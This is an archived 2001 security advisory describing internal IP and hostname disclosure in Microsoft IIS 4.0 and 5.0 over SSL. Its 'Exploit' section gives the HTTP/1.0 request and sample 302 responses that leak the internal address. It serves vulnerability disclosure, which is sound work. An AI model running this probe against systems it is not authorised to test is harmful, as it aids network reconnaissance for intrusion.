GGS-AU / e-Synergies Security Advisory August 8, 2001 Internal IP Address Disclosure in Microsoft-IIS 4.0 & 5.0 Synopsis: e-Synergies has discovered and researched remote vulnerability in Internet Information Server from Microsoft. Successful exploitation of this vulnerability can reveal critical internal information such as Internal IP Address or Internal host name. Affected Versions: Microsoft IIS 4.0 running SSL Microsoft IIS 5.0 running SSL Description: By connecting manually to port TCP/443 (SSL) using Perl(SSLeay) or any other tools, a remote user has the ability to retrieve Internal IP address or reveal the machine's network node hostname. Exploit: 1- Browse the web site using a normal SSL browser and find any directory. I.E.: https://www.target.com/images/icon.gif 2- Using a compatible SSL Perl script, execute the following command once connected to port 443 of www.target.com: GET /images HTTP/1.0 3- The result should look like this: HTTP/1.1 302 Object Moved Location: https://192.168.1.10/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx or HTTP/1.1 302 Object Moved Location: https://netbiosname/images/ Server: Microsoft-IIS/4.0 Content-Type: text/html Content-Length: xxx Remarks: Using HTTP/1.1 instead of HTTP/1.0 will not give the same result. Credits: Marek Roy Senior IT Security Consultant Please send suggestions, updates, and comments to: GGS-AU / e-synergies, Sydney, Australia Level 9 65 York Street Sydney NSW 2001 Australia Phone: +61 2 9279 2533 Fax: +61 2 9279 2544 Email: enquiries@ggs-au.com http://www.ggs-au.com
This archive was generated by hypermail 2b30 : Wed Aug 08 2001 - 08:18:33 PDT